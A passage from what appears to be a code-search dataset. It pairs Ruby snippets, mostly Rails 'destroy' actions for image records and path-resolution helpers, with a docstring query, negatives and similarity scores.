"def destroy\n @image = Image.find(params[:id])\n \n imagen = @image.filename\n \n #function in manage_images.rb\n remove_image_file(imagen)\n \n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @vmimage.destroy\n respond_to do |format|\n format.html { redirect_to vmimages_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @imagedemo.destroy\n respond_to do |format|\n format.html { redirect_to imagedemos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @sample_photo.destroy\n render json: {message: 'Foto Excluida'} , status: :ok\n end",
"def destroy\n request(:delete, \"/computing/image/#{uuid}\")\n true\n end",
"def deleteEntityImage( entity_id, gen_id)\n params = Hash.new\n params['entity_id'] = entity_id\n params['gen_id'] = gen_id\n return doCurl(\"delete\",\"/entity/image\",params)\n end",
"def destroy\n id = @taxi_image.taxi_sevice_id\n @taxi_image.destroy\n respond_to do |format|\n format.html { redirect_to \"/taxi_sevices/\" + id.to_s, notice: 'Taxi image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_to_sample.destroy\n respond_to do |format|\n format.html { redirect_to image_to_samples_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @s3_image = S3Image.find(params[:id])\n @s3_image.destroy\n\n respond_to do |format|\n format.html { redirect_to s3_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n ImagesIndex.delete params[:id]\n respond_to do |format|\n format.html { redirect_to(\"/images_indices\") }\n format.xml { head :ok }\n end\n end",
"def destroy\n @banner_img = BannerImg.find(params[:id])\n @banner_img.destroy\n\n respond_to do |format|\n format.html { redirect_to banner_imgs_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n Image.find(params[:id]).destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @animal_image.destroy\n respond_to do |format|\n format.html\n format.js {}\n format.json { render json: { ok: true } }\n end\n end",
"def destroy\n @photo = Photo.find(params[:id])\n\n # Destroy s3 objects\n aws_s3_delete(@photo.key)\n Sebitmin::Application.config.thumbnail_sizes.each do |thumbnail_size|\n aws_s3_delete(@photo[\"thumbnail_key_#{thumbnail_size}\"])\n end\n\n @photo.destroy\n\n respond_to do |format|\n format.html { redirect_to \"/\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_upload = ImageUpload.find(params[:id])\n @image_upload.destroy\n\n respond_to do |format|\n format.html { redirect_to image_uploads_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was deleted successfully.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_section = ImageSection.find(params[:id])\n @image_section.destroy\n\n respond_to do |format|\n format.html { redirect_to image_sections_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @bgimage = Bgimage.find(params[:id])\n @bgimage.destroy\n\n respond_to do |format|\n format.html { redirect_to bgimages_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @item.image.destroy\n @item.destroy\n respond_to do |format|\n format.html { redirect_to items_url, notice: 'Item was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @setup_image.destroy\n respond_to do |format|\n format.html { redirect_to :back }\n format.json { head :no_content }\n end\n end",
"def destroy\n @recipe_image.destroy\n respond_to do |format|\n format.html { redirect_to recipe_images_url, notice: 'Recipe image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n compute.delete_flavor(params[:id])\n \n\n respond_to do |format|\n format.html { redirect_to flavors_path }\n format.json { head :ok }\n end\n end",
"def destroy\n ApiAction.new.destroy_image(@logo.uuid_image)\n @logo.destroy\n respond_to do |format|\n format.html { redirect_to campaign_path(@logo.campaign), notice: 'Logo was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @loc_image.destroy\n respond_to do |format|\n format.html { redirect_to loc_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @photo = Photo.find(params[:id])\n File.delete(Rails.root.join(\"app\",'assets','images',@photo.path))\n @photo.destroy\n\n respond_to do |format|\n format.html { redirect_to photos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n file_url = @image.url\n @image.destroy\n\n File.delete(\"public/uploads/#{file_url}\")\n\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @img.destroy\n respond_to do |format|\n format.html { redirect_to imgs_url, notice: \"Img was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @img = Img.find(params[:id])\n @img.destroy\n\n respond_to do |format|\n format.html { redirect_to(imgs_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @variant = Variant.find(params[:id])\n @variant.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_product_variants_url(@variant.master_id) }\n format.json { head :no_content }\n end\n end",
"def destroy\n @featureimg.destroy\n respond_to do |format|\n format.html { redirect_to featureimgs_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @motivational_image = MotivationalImage.find(params[:id])\n @motivational_image.destroy\n\n respond_to do |format|\n format.html { redirect_to motivational_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_url = ImageUrl.find(params[:id])\n @image_url.destroy\n\n respond_to do |format|\n format.html { redirect_to image_urls_url }\n format.json { head :no_content }\n end\n end",
"def delete_storage(request, params)\n # --- Get the Image ---\n image = ImageOCCI.new(\n Image.build_xml(params[:id]),\n @client)\n\n # --- Delete the Image ---\n rc = image.delete\n if OpenNebula.is_error?(rc)\n return rc, CloudServer::HTTP_ERROR_CODE[rc.errno]\n end\n\n return \"\", 204\n end",
"def destroy\n @variant.destroy\n respond_to do |format|\n format.html { redirect_to admin_product_variants_url(@product) }\n format.json { head :no_content }\n end\n end",
"def destroy\n @match_image = MatchImage.find(params[:id])\n @match_image.destroy\n\n respond_to do |format|\n format.html { redirect_to match_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n redirect_to console_images_path\n end",
"def destroy\n @slider_image = SliderImage.find(params[:id])\n @slider_image.destroy\n\n respond_to do |format|\n format.html { redirect_to slider_images_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @slider_image = SliderImage.find(params[:id])\n @slider_image.destroy\n\n respond_to do |format|\n format.html { redirect_to slider_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @property_image = PropertyImage.find(params[:id])\n @property_image.destroy\n\n respond_to do |format|\n format.html { redirect_to property_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete_aos_version(args = {}) \n delete(\"/aosversions.json/#{args[:aosVersionId]}\", args)\nend",
"def destroy\n image = Image.find(params[:id])\n if image.user_id == current_user.id\n image.destroy\n render json:{}, status:201\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: \"Image was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n #If image has parent, update children and vice versa\n if image.root_version? then\n newroot = image.child_versions.order(:created_at).last\n image.child_versions.delete(newroot)\n image.child_versions.each do |v| v.parent_image = newroot and v.save end\n else\n image.child_versions.each do |v| v.parent_image = image.parent_image and v.save end\n end\n\n image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @s3image.destroy\n respond_to do |format|\n format.html { redirect_to s3images_url, notice: 'S3image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @structure_photo.destroy\n render json: {message: 'Foto Excluida'} , status: :ok\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n head :no_content\n end",
"def destroy\n @image_path = ImagePath.find(params[:id])\n @image_path.destroy\n\n respond_to do |format|\n format.html { redirect_to(image_paths_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @showcase = Showcase.find(params[:showcase_id])\n @showcase_image = ShowcaseImage.find(params[:id])\n @showcase_image.destroy\n\n respond_to do |format|\n format.html { redirect_to edit_showcase_path(@showcase) }\n format.xml { head :ok }\n end\n end",
"def image_destroy\n result = RestaurantManage.image_destroy(@restaurant, params[:pic_id])\n get_restaurant()\n render json: result\n end",
"def destroy\n @image = Image.find(params[:id])\n checkaccountobject(\"images\",@image)\n cloud = Oecloud.new(:zone => @image.zone, :image => @image)\n if cloud.deregisterimage\n @image.destroy\n end\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to root_path, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy()\n respond_to do |format|\n format.html { redirect_to images_url, notice: \"Image was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def delete_image(image_id)\n delete(\"cloud-instances/#{guid}/images/#{image_id}\")\n end",
"def destroy\n @image.tags.destroy_all\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @gallery = Gallery.find(params[:id])\n\n begin\n AWS::S3::S3Object.find(@gallery.thumbnail, @@BUCKET).delete\n rescue Exception=>e\n # handle e\n end\n \n @gallery.destroy\n\n respond_to do |format|\n format.html { redirect_to galleries_url }\n format.json { head :no_content }\n end\n end",
"def delete_image(id)\n uri = URI.parse(\"http://\" + @location.host + \":\" + @location.port.to_s + \"/v2/images/\" + id)\n return delete_request(uri, @token)\n end",
"def destroy\n @photo.destroy\n respond_to do |format|\n format.html { redirect_to uploads_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html {redirect_to admin_path, notice: 'Image was successfully destroyed.'}\n format.json {head :no_content}\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_images_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @admin_image.destroy\n respond_to do |format|\n format.html { redirect_to admin_images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Gui::Image.find(params[:id])\n @image.destroy\n redirect_to gui_panels_path\n\n # respond_to do |format|\n # format.html { redirect_to gui_images_url }\n # format.json { head :no_content }\n # end\n end",
"def destroy\n @bwimage = Bwimage.find(params[:id])\n @bwimage.destroy\n\n respond_to do |format|\n format.html { redirect_to bwimages_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @objective_image.destroy\n respond_to do |format|\n format.html { redirect_to objective_images_url, notice: 'Objective image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review_image = ReviewImage.find(params[:id])\n @review_image.destroy\n\n respond_to do |format|\n format.html { redirect_to review_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @story_image.destroy\n respond_to do |format|\n format.html { redirect_to story_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @slide_image = SlideImage.find(params[:id])\n @slide_image.destroy\n\n respond_to do |format|\n format.html { redirect_to slide_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @pet_image_repo.destroy\n respond_to do |format|\n format.html { redirect_to :back, notice: 'Image was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n output = \"oneimage delete #{resource[:name]} \", self.class.login\n `#{output}`\n end"
] | [
"0.71142924",
"0.7108093",
"0.7081805",
"0.7033761",
"0.6999009",
"0.69973284",
"0.69886255",
"0.6982736",
"0.69627947",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6943084",
"0.691388",
"0.69135904",
"0.69056183",
"0.68884355",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.687497",
"0.6874781",
"0.6857338",
"0.6856384",
"0.6850554",
"0.68480664",
"0.6832379",
"0.68316185",
"0.68296874",
"0.6820716",
"0.6820041",
"0.6812784",
"0.6812442",
"0.6811517",
"0.6810214",
"0.6804466",
"0.6799503",
"0.6794745",
"0.67917854",
"0.6790163",
"0.678389",
"0.6775989",
"0.6774402",
"0.6763649",
"0.6758626",
"0.6752807",
"0.6745241",
"0.67448676",
"0.6741558",
"0.6739329",
"0.6735025",
"0.6729443",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.671985",
"0.6715861",
"0.67150056",
"0.670962",
"0.67094177",
"0.6706716",
"0.67064625",
"0.670524",
"0.6702187",
"0.6691352",
"0.6690678",
"0.66896194",
"0.66856056",
"0.66855824",
"0.66841817",
"0.66714644",
"0.6668055",
"0.6664831",
"0.6663",
"0.6662593",
"0.6660426",
"0.666021",
"0.6659048",
"0.66548276",
"0.66535854",
"0.6651084",
"0.66509116",
"0.6647134",
"0.6645403"
] | 0.76444316 | 0 |
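A minimal client-side sketch of exercising the DELETE route from the record above, assuming a local Rails server; the host, port, and record id here are illustrative, not taken from the source. The action answers the .json variant with "head :ok", so a successful call returns an empty 200 body.

require 'net/http'

uri = URI('http://localhost:3000/variant_images/1.json')
req = Net::HTTP::Delete.new(uri)

# Issue the request; the block form of Net::HTTP.start closes the connection for us.
res = Net::HTTP.start(uri.hostname, uri.port) { |http| http.request(req) }
puts res.code   # => "200" on success (empty body, per head :ok)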
Return an absolute path within the working directory. The working directory is determined by: the value of the BREWED_WORKING_DIR env var; when run_mode is :daemon, the working dir is state_dir; otherwise, the current directory. | def working_dir(*path)
if _working_dir.nil?
@_working_dir = ENV['PROJECT_WORKING_DIR']
if _working_dir != nil
@_working_dir = Pathname.new(expand_variables _working_dir)
Dir.chdir _working_dir.to_s
elsif run_mode == :daemon
@_working_dir = state_dir
Dir.chdir _working_dir.to_s
else
@_working_dir = Pathname.getwd
end
raise "working_dir not a directory: #{_working_dir.safe_s}" unless _working_dir.directory?
end
[_working_dir, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def working_dir\n ENV['PWD'] || Dir.pwd\n end",
"def working_dir\n @_working_dir ||= File.expand_path(options['merb-root'] || Dir.pwd)\n end",
"def working_dir\n @_working_dir ||= File.expand_path(options['merb-root'] || Dir.pwd)\n end",
"def working_dir\n @_working_dir ||= File.expand_path(options['merb-root'] || Dir.pwd)\n end",
"def working_directory\n @options[:working_directory]\n end",
"def dir\n @working_directory\n end",
"def getWorkingDir\n if(@workingDir != nil)\n return @workingDir\n end\n currDir = Dir.pwd\n dr = \"\"\n currDir.split(\"/\").each{ |entry|\n dr = dr+entry+\"/\"\n #puts dr\n if(File.directory? dr+\".hoster\")\n @workingDir = dr+\".hoster\"\n end\n }\n @workingDir\n end",
"def getWorkingDir\n currDir = Dir.pwd\n dr = \"\"\n currDir.split(\"/\").each{ |entry|\n dr = dr+entry+\"/\"\n #puts dr\n if(File.directory? dr+\".hoster\")\n @workingDir = dr+\".hoster\"\n end\n }\n @workingDir\n end",
"def working_dir\n return nil if !repo || !user\n return \"#{Bini.data_dir}/repos/#{user}/#{repo}\"\n end",
"def working_directory\n @link.WorkingDirectory\n end",
"def current_working_directory; @rye_current_working_directory; end",
"def working_dir(&block)\n return Dir.chdir(@working_dir, &block) if block_given?\n @working_dir\n end",
"def work_dir; end",
"def prefixed_working_directory\n return self.storage.prefixed_working_directory\n end",
"def cwd\n return cd(\"\").to_s\n end",
"def [](fpath=nil)\n if fpath.nil? || fpath.index('/') == 0\n @rye_current_working_directory = fpath\n else\n # Append to non-absolute paths\n if @rye_current_working_directory\n newpath = File.join(@rye_current_working_directory, fpath)\n @rye_current_working_directory = newpath\n else\n @rye_current_working_directory = fpath\n end\n end\n debug \"CWD: #{@rye_current_working_directory}\"\n self\n end",
"def work\n '/' + File.dirname(file)\n end",
"def cwd\n @cwd ||= begin\n exec! 'pwd'\n rescue => e\n raise e\n '/'\n end\n end",
"def workdir\n @workdir ||= ::File.join(::File.dirname(@repo_dir), 'download')\n end",
"def run_dir\n result = File.join(osw_dir, 'run')\n if @workflow_json\n begin\n result = @workflow_json.absoluteRunDir.to_s\n rescue StandardError\n end\n end\n result\n end",
"def run_dir\n result = File.join(osw_dir, 'run')\n if @workflow_json\n begin\n result = @workflow_json.absoluteRunDir.to_s\n rescue StandardError\n end\n end\n result\n end",
"def working_directory\n if @working_directory.nil?\n raise \"`working_directory` for the current storage provider is `nil` as the `#download` method was never called\"\n end\n return @working_directory\n end",
"def guess_working_path\n unless File.directory?(File.join(Dir.pwd, '.git'))\n raise \"Current working directory doesn't seem to be a Git working directory.\"\n end\n Dir.pwd\nend",
"def cwd(pid)\n\tFile.readlink(\"/proc/#{pid}/cwd\")\nend",
"def work_dir\n # The directory is not stored in a variable so it can be overridden\n # in specs.\n File.join(base_dir, \"ruby-#{RUBY_VERSION}\", \"rbs-#{RBS::VERSION}\", \"solargraph-#{Solargraph::VERSION}\")\n end",
"def work_path\n @work_path ||= tmp_path.join(name)\n end",
"def working_file(file)\n \"#{working_dir}/#{file_string(file)}\"\n end",
"def cwd\n @target.is_a?(String) && File.directory?(@target) ? @target : \"./\"\n end",
"def exec_env_directory\n filename.dirname.to_s\n end",
"def get_pwd\n env_stat = File.stat(ENV['PWD'])\n pwd_stat = File.stat(Dir.pwd)\n if env_stat.ino == pwd_stat.ino && env_stat.dev == pwd_stat.dev\n ENV['PWD']\n else\n Dir.pwd\n end\n end",
"def base_path\n @base_path ||= Dir.pwd\n end",
"def getwd\n Dir.getwd\n end",
"def work_dir\n AYTests.work_dir\n end",
"def current_dir; end",
"def integration_cwd\n root.to_s\n end",
"def current_dir\n File.dirname(file_path)\n end",
"def curr_srcdir\n \"#{srcdir_root()}/#{relpath()}\"\n end",
"def curr_srcdir\n \"#{srcdir_root()}/#{relpath()}\"\n end",
"def event_state_dir(state_dir = nil)\n if ENV['WF_EVENT_STATE_DIR']\n Pathname.new(ENV['WF_EVENT_STATE_DIR'])\n elsif state_dir.nil?\n EVENT_STATE_DIR\n else\n Pathname.new(state_dir)\n end\n end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def workdir\n result = base.join('cache')\n result.mkpath\n result\n end",
"def curr_srcdir\n \"#{srcdir_root()}/#{relpath()}\"\n end",
"def current_directory\n File.expand_path @current_directory\n end",
"def cwd\n Dir.getwd\n end",
"def target_dir\n return @target_dir ? @target_dir : Dir.home\n end",
"def containing_directory\n path.dirname\n end",
"def basedir\n return nil if !file\n File.dirname File.absolute_path @file\n end",
"def abs_path\n @abs_path ||= \n owner &&\n begin\n @abs_path = EMPTY_ARRAY # recursion lock.\n\n x = path.map { | dir | File.expand_path(expand_string(dir), owner.base_directory) }\n\n arch_dir = arch_dir_value\n if arch_dir\n # arch_dir = [ arch_dir ] unless Array === arch_dir\n x.map! do | dir |\n if File.exist?(dir_arch = File.join(dir, arch_dir))\n dir = [ dir_arch, dir ]\n # $stderr.puts \" arch_dir: dir = #{dir.inspect}\"\n end\n dir\n end\n x.flatten!\n\n # $stderr.puts \" arch_dir: x = #{x.inspect}\"\n end\n\n if remove_non_existant_paths\n x.reject! { | p | ! File.exist?(p) }\n end\n\n @abs_path = x\n end\n end",
"def path_to_root\n path_to_script = Pathname.new(File.expand_path $PROGRAM_NAME)\n path_to_parent = path_to_script.parent\n\n if path_to_parent.basename.to_s == 'bin'\n path_to_parent = path_to_parent.parent\n end\n path_to_parent\n end",
"def basedir\n File.dirname File.absolute_path options[:file]\n end",
"def pwd\n Dir.pwd\n end",
"def work_dir=(path)\n path << '/' unless path.end_with?('/')\n @work_dir = path\n end",
"def full_path_to_remote_dir\n (remote_dir[0] == ?/ ? remote_dir : \"$(pwd)/#{remote_dir}\").chomp('/')\n end",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end",
"def is_working_dir path\n File.exist? File.expand_path \".git\", path\n end",
"def directory\n @config.get('WATCH_DIRECTORY') || abort('Missing WATCH_DIRECTORY')\n end",
"def base_path\n @base_path ||= server_path(File.expand_path(Dir.pwd))\n end",
"def workspace_folder\n @pwd\n end",
"def working_directory(v)\n @options[:working_directory] = v\n end",
"def runDir\n if @workflow[:run_directory]\n OpenStudio.toPath(@workflow[:run_directory])\n else\n OpenStudio.toPath('./run')\n end\n end",
"def cwd\n File.expand_path(@options[:cwd] || \".\")\n end",
"def base_dir\n return Gem.dir unless loaded_from\n @base_dir ||= if default_gem? then\n File.dirname File.dirname File.dirname loaded_from\n else\n File.dirname File.dirname loaded_from\n end\n end",
"def root\n settings[:basedir]\n end",
"def pwd\r\n ndev.rpc.command(\"show cli directory\").text.strip\r\n end",
"def osw_dir\n File.dirname(@osw_abs_path)\n end",
"def osw_dir\n File.dirname(@osw_abs_path)\n end",
"def path\n Rails.root.join(ROOT, type, name, executable).to_s\n end",
"def executable_path; end",
"def build_working_dir(&block)\n file_name =\n if block.respond_to?(:source_location)\n block.source_location[0]\n else\n eval(\"__FILE__\", block.binding)\n end\n\n @working_dir = File.expand_path(\n File.join(File.dirname(file_name), \"generated\"))\n end",
"def cfg_dir\n File.join(@full_path, CONFIG_DIR)\n end",
"def path\n @path ||= File.dirname @config_file\n end",
"def dir_path\n File.expand_path(File.dirname(@path))\n end",
"def basedir\n self.class._basedir\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def current_path\n ::File.join(install_path, artifact_name, 'current')\n end",
"def dir\n File.dirname(__FILE__)\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def root; Pathname(__dir__).parent; end",
"def core_cfg_path\n File.expand_path(ENV[\"DBS_CFGDIR\"].presence || \"~/.db_sucker\")\n end",
"def absolute_parent_path\n File.dirname absolute_path\n end",
"def path\n env[PATH] ||= (env.has_key?(GIT) ? env[GIT].path : Dir.pwd)\n end",
"def root\n File.dirname __dir__\n end",
"def root\n File.dirname __dir__\n end",
"def root_path\n @root_path ||= `git rev-parse --show-toplevel`.chomp\n end",
"def path\n File.join(RH_CONFIG[\"location\"], self.parent.pid.gsub(/:/,\"_\"), \"data\", self.name.first) unless self.parent.nil? or self.name.empty?\n end",
"def dir_base\n File.expand_path(File.dirname(__FILE__)+\"/../..\")\n end",
"def absolutepath\n if absolute?\n self\n elsif to_s == \".\"\n realpath\n else\n parent.absolutepath + self.basename\n end\n end",
"def app_dir_pathname\n @app_dir_pathname ||= Pathname.new(app_name)\n end",
"def where_to_save\n output_dir = @template_options[OUTPUT_DIR]\n # assume absolute\n full_path = output_dir\n if (Pathname.new(output_dir)).relative?\n full_path = File.expand_path(output_dir, Dir.pwd)\n end\n return full_path\n end",
"def path\n application? ? application_path : local_path\n end",
"def repo_path\n if !self.cmd_opt.empty?\n if self.is_git?\n self.fake_path = self.cmd_opt.gsub(\"'\",\"\").split(\"/\")[-1]\n self.real_path = Settings.aq_sh.user_home + \"/\" +\n Settings.aq_sh.user_name + \"/\" +\n Settings.git.repo_path + \"/\" +\n self.username_from_cmd + \"/\" +\n self.fake_path\n return self.real_path\n elsif self.is_hg?\n self.fake_path = self.cmd_opt.split(\" \")[1]\n self.real_path = Settings.aq_sh.user_home + \"/\" +\n Settings.aq_sh.user_name + \"/\" +\n Settings.hg.repo_path + \"/\" +\n self.fake_path\n return self.real_path\n end\n end\n end",
"def root\n return @root if @root\n @root = dir = Dir.pwd\n begin\n dir = File.dirname(dir)\n return @root = dir if File.exist?(File.join(dir, \"#{BASENAME}.rb\"))\n end while dir != '/'\n\n @root\n end",
"def root\n File.expand_path(File.dirname(File.dirname(File.dirname(__dir__))))\n end",
"def __path__\n File.join(root, 'tmp', 'build')\n end",
"def root\n Dir.pwd\n end",
"def locate_root(cwd=Pathname.new(Dir.pwd))\n return cwd.to_s if (cwd + 'config.rb').exist?\n return false if cwd.root?\n locate_root(cwd.parent)\n end",
"def location\n return unless exists?\n folder_pathname.relative_path_from(root_path)\n end",
"def bin_dir\n @bin_dir ||= File.join gem_dir, bindir\n end",
"def this_dir\n File.expand_path(File.dirname(caller_file(caller)))\n end"
] | [
"0.7353413",
"0.70150113",
"0.70150113",
"0.70150113",
"0.6645491",
"0.6588737",
"0.6554053",
"0.6401448",
"0.6390032",
"0.63678426",
"0.6304743",
"0.6300227",
"0.6096617",
"0.60856885",
"0.6035078",
"0.6032209",
"0.5986275",
"0.5929604",
"0.58885217",
"0.58795285",
"0.58795285",
"0.5879041",
"0.58432055",
"0.5841977",
"0.58396256",
"0.5831663",
"0.5831585",
"0.57856",
"0.5748515",
"0.573438",
"0.5732807",
"0.5695668",
"0.5663026",
"0.5662967",
"0.56318563",
"0.5626502",
"0.5623399",
"0.5623399",
"0.5605567",
"0.56019217",
"0.5586736",
"0.5571387",
"0.5570498",
"0.5557112",
"0.5554216",
"0.5543376",
"0.553805",
"0.55375355",
"0.5526193",
"0.5516379",
"0.55041224",
"0.5502063",
"0.55017275",
"0.5481849",
"0.54344475",
"0.5432136",
"0.5426688",
"0.54140365",
"0.54070204",
"0.5400655",
"0.53875405",
"0.5365881",
"0.53637326",
"0.5352937",
"0.5351186",
"0.5351186",
"0.534502",
"0.5343661",
"0.5340551",
"0.5338804",
"0.5337093",
"0.5336446",
"0.5325843",
"0.53135836",
"0.5310704",
"0.5309853",
"0.5291036",
"0.5291036",
"0.52908343",
"0.52888435",
"0.52884394",
"0.5285342",
"0.5277539",
"0.5277539",
"0.52773213",
"0.52696204",
"0.52684706",
"0.526441",
"0.52621204",
"0.52524287",
"0.52524066",
"0.5247494",
"0.52431124",
"0.5237996",
"0.5225435",
"0.5222823",
"0.5222608",
"0.52198076",
"0.5212911",
"0.5205919"
] | 0.735547 | 0 |
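A self-contained sketch of the same resolution precedence as working_dir in the record above: an environment variable wins, then a daemon-mode state directory, then the current directory. The method name and the default state_dir are assumptions for illustration (the env var name mirrors the ENV check in the source code), not the source's API.

require 'pathname'

# Resolve a base directory: env var first, then daemon state dir, then cwd.
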